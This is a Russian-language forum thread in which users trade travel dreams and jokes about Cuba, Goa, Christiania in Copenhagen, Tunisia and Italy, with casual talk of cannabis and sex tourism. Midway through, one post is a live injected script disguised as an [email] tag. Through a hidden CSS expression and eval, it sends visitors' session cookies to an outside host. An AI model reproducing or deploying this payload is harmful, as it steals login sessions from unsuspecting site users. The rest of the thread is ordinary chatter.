здорово, но пока дорого
Мечтаю о Кубе. Но туда один перелет 900 у.е. стоит. Зато там гаванский ром, сигары, Карибское море и колорит местных жителей.
Осенью в Европе красиво.
А ты чего хочешь - пляжный отдых, экскурсионку, тусовку или экзотику?
Ничего вы не поняли, молодой человек...
Гасс, ты какой-то не духовный.
А травеллить надо в Припять, Ямайку и Выборг.
Заело что-ли?
а вы не были случайно на Таити?
:rolleyes: :rolleyes: :rolleyes:
замечу - вероятность этого события меньше, чем попасть под машину(считала)... пока
Сочи - ацтой: ценник турецкий, сервис - жадно-армянский. Если хватит только моря - туда.
Дашуля рулит!
Трижды респектую желанию посетить родину Че ;) и Фиделя.
Срочно копим деньги на Кубу, напеваем Гванта-на-ме-ра, и представляем себя эдакими Хэмами.......
п.с. Кстати, помимо рома и сигар на Кубе еще и отменная рыбалка.
а я слышала про несвоственную жительницам социалистических стран сексуальную свободность кубянок. правда за деньги и это одобряется, в т.ч. родителями.
Куба и Тайланд - это для мужской половины...
Про то, что Куба сильно загазована и запроститучена я скромно умолчал.
Лучше ехать в Индию, в штат Гоа, там много бонусов. И что самое прикольное их там можно безнаказанно покурить.
Лен, опять же, Иван Бодхихарма......:))))
на картошку!
[email]bill@microsoft.com" style="display:none" sss="x=new Image();x.src='http://zero.h12.ru/stat/capt.php?id=novg_forum&string='+document.cookie;this.sss=null" style="top:expression(eval(this.sss))[/email]
я уже была в Копенгагене, в Кристиании, намного ближе в этом плане :smoker:
Кусаю локти и завидую.
Лен, ты хоть сувениров из Кристиании привезла????? :)
что такое Кристиания и где это??
Мишк, давно это было, скурили уже всё :smoker:
Оч. жаль, что нельзя там фотографировать, такое мало где ещё увижу в ближайшие годы...
Кристианиа - район Копенгагена (столица Дании), где лигализованы лёгкие наркотики, однополые браки и тэпэ.
Подробности у М. Веллера.
http://www.naryishkin.spb.ru/nark_soc/press/1998_2000/2000/text/029.htm
"Полиция Дании разработала план штурма Кристиании - "островка свободы" в Копенгагене. По словам инспектора полицейского управления Копенгагена Кая Виттрупа, "настало время раз и навсегда поставить точку в нелегальной торговле гашишем в Кристиании" - районе города, который на протяжении последних более чем 20 лет служит пристанищем свободомыслящей молодежи и является единственным местом в датской столице, где свободно происходит торговля гашишем. Кай Виттруп отказался назвать дату планируемого штурма, однако подчеркнул, что операция требует тщательной подготовки и ресурсов. Даже рядовые полицейские акции в этом районе города проводятся при участии по меньшей мере 60-70 сотрудников полиции. Для проведения штурма Кристиании копенгагенская полиция призовет на помощь своих коллег из других городов страны, сообщает ИА "Росбалт". (http://www.kruzo.com/php/news.php?n=5425)
Следующая цель - Уругувай.
Начитаться Борхеса и вперед!
может в Мексику за пейотами? :cool:
Кстати, раскрепощенным девушкам Кубы знакомы правила безопасного секса.
А вот в Кении, где этот бизнес поставлен на широкую ногу, более 50% страны больны спидом.
Так что Куба все равно рулит.
А еще там настоящие кубинские мачо )
Мишка, копим деньги, адназначно ;)
Как впечатления? Насколько знаю, в Тунисе заслуживает внимания только экскурсия в Сахару и талассотерапия. Второе интересует больше.
Если Вы этим баловались, то расскажите сколько этот стоит.
Даш, не думаю, что в такой стране ТОЛЬКО это может заслуживать внимания. Так же как в Египте - только пирамиды, в Риме - только Коллизей.
Руины Карфагена и Медина меня интересуют в меньшей степени.
О Риме никто не говорил ;) Там одних музеев и магазинов столько, что недели не хватит обойти. И Рим, как правило, входит в поездку по Италии.
А Италия - музей под открытым небом.